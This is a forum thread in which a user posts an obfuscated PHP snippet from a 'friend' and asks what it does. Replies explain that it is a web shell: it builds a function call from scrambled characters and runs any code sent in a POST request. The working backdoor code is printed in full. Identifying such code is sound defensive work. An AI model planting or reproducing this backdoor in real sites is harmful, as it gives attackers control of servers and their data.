What Is This Code Used For?

[Lejong]

Hey guy's, Can anybody tell me what this is used for?

 

<?php 
error_reporting(0);$_=i_find_it_fun_to_create;$__=$_[2].$_[11].chr(119-9).$_[17].$_[14].chr(105).$_[15].chr(110).chr(95).$_[17].chr(110+4).chr(101).chr(97).$_[21].chr(101);$_=explode(chr(95),$__);$__=$_[1].chr(95).$_[0];$_=$__(null,array_pop($_POST));$_();

Edited November 21, 2012 by Lejong

[Pikachu2000]

It has fatal parse errors, so it really can't be used for anything at all.

[requinix]

Fatal? Undefined constant but that's not fatal.

 

That code an obfuscated form of something malicious, which I won't post because (1) it's not very well obfuscated and (2) it's malicious.

Edited November 21, 2012 by requinix

[Pikachu2000]

PHP disagrees with you: Parsing Error: /Applications/MAMP/htdocs/file.php line 2 - syntax error, unexpected T_VARIABLE

 

EDIT: Nevermind, the code has been changed from what it originally was.

Edited November 21, 2012 by Pikachu2000

[requinix]

EDIT: Nevermind, the code has been changed from what it originally was.

Don't you just love it when that happens?

 

Since Lejong asked, the purpose of that code is to allow anyone to run whatever code they want on your server. If I knew that page was there then I could dump your database, insert and delete whatever information I wanted, look at other files on your server, install more exploits in your site (or server), hijack the site for spam or phishing, run up huge bills in your name... pretty much anything I felt like.

 

You said your friend gave that to you? Some friend.

Edited November 21, 2012 by requinix